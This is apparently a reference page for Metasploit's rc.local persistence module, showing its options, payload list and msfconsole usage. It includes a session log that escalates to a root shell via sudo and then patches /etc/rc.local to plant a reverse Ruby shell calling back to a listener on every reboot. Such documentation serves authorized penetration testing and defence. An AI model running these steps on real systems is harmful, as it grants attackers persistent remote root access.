rc.local Persistence - Metasploit

This page contains detailed information about how to use the exploit/linux/local/rc_local_persistence metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: rc.local Persistence
Module: exploit/linux/local/rc_local_persistence
Source code: modules/exploits/linux/local/rc_local_persistence.rb
Disclosure date: 1980-10-01
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will edit /etc/rc.local in order to persist a payload. The payload will be executed on the next reboot.

Module Ranking and Traits

Module Ranking:

• excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage

Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/rc_local_persistence
msf exploit(rc_local_persistence) > show targets
    ... a list of targets ...
msf exploit(rc_local_persistence) > set TARGET target-id
msf exploit(rc_local_persistence) > show options
    ... show and set options ...
msf exploit(rc_local_persistence) > set SESSION session-id
msf exploit(rc_local_persistence) > exploit

Required Options

• SESSION: The session to run this module on.

Knowledge Base

msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo 
msf5 post(multi/manage/sudo) > set session 3
session => 3
msf5 post(multi/manage/sudo) > run

[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] No password available, trying a passwordless sudo.
[+] SUDO: Root shell secured.
[*] Post module execution completed

msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby
payload => cmd/unix/reverse_ruby
msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41
LHOST => 192.168.0.41
msf5 exploit(linux/local/rc_local_persistence) > run

[*] Reading /etc/rc.local
[*] Patching /etc/rc.local

Go back to menu.

Msfconsole Usage

Here is how the linux/local/rc_local_persistence exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/rc_local_persistence

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/local/rc_local_persistence) > show info

       Name: rc.local Persistence
     Module: exploit/linux/local/rc_local_persistence
   Platform: Unix, Linux
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 1980-10-01

Provided by:
  Eliott Teissonniere

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:
  Avoid: 3 characters

Description:
  This module will edit /etc/rc.local in order to persist a payload. 
  The payload will be executed on the next reboot.

Module Options

This is a complete list of options available in the linux/local/rc_local_persistence exploit:

msf6 exploit(linux/local/rc_local_persistence) > show options

Module options (exploit/linux/local/rc_local_persistence):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options

Here is a complete list of advanced options supported by the linux/local/rc_local_persistence exploit:

msf6 exploit(linux/local/rc_local_persistence) > show advanced

Module advanced options (exploit/linux/local/rc_local_persistence):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   true             no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the linux/local/rc_local_persistence module can exploit:

msf6 exploit(linux/local/rc_local_persistence) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/rc_local_persistence exploit:

msf6 exploit(linux/local/rc_local_persistence) > show payloads

Compatible Payloads
===================

   #   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_netcat                          normal  No     Unix Command Shell, Bind TCP (via netcat)
   1   payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   2   payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/unix/bind_ruby                            normal  No     Unix Command Shell, Bind TCP (via Ruby)
   4   payload/cmd/unix/bind_ruby_ipv6                       normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   5   payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   6   payload/cmd/unix/pingback_bind                        normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   7   payload/cmd/unix/pingback_reverse                     normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   8   payload/cmd/unix/reverse_netcat                       normal  No     Unix Command Shell, Reverse TCP (via netcat)
   9   payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   10  payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   11  payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   12  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   13  payload/cmd/unix/reverse_ruby                         normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   14  payload/cmd/unix/reverse_ruby_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)

Evasion Options

Here is the full list of possible evasion options supported by the linux/local/rc_local_persistence exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/rc_local_persistence) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RC_PATH> is not writable

Here is a relevant code snippet related to the "<RC_PATH> is not writable" error message:

37:	
38:	  def exploit
39:	    rc_path = '/etc/rc.local'
40:	
41:	    unless writable? rc_path
42:	      fail_with Failure::BadConfig, "#{rc_path} is not writable"
43:	    end
44:	
45:	    print_status "Reading #{rc_path}"
46:	
47:	    # read /etc/rc.local, but remove `exit 0`

Go back to menu.

Related Pull Requests

• #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
• #12832 Merged Pull Request: DisablePayloadHandler replace strings with bools
• #10910 Merged Pull Request: Use writable? method for local modules
• #10320 Merged Pull Request: [GSOC] Rc local persistence

Go back to menu.

See Also

Check also the following modules related to this module:

• post/windows/gather/credentials/razer_synapse
• exploit/linux/local/apt_package_manager_persistence
• exploit/linux/local/autostart_persistence
• exploit/linux/local/bash_profile_persistence
• exploit/linux/local/cron_persistence
• exploit/linux/local/service_persistence
• exploit/linux/local/yum_package_manager_persistence
• exploit/osx/local/persistence
• exploit/unix/local/at_persistence
• exploit/windows/local/persistence
• exploit/windows/local/registry_persistence
• exploit/windows/local/s4u_persistence
• exploit/windows/local/vss_persistence
• exploit/windows/local/wmi_persistence
• exploit/windows/local/persistence_image_exec_options
• exploit/windows/local/persistence_service
• post/linux/manage/sshkey_persistence
• post/windows/manage/persistence_exe
• post/windows/manage/sshkey_persistence

Authors

• Eliott Teissonniere

Version

This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.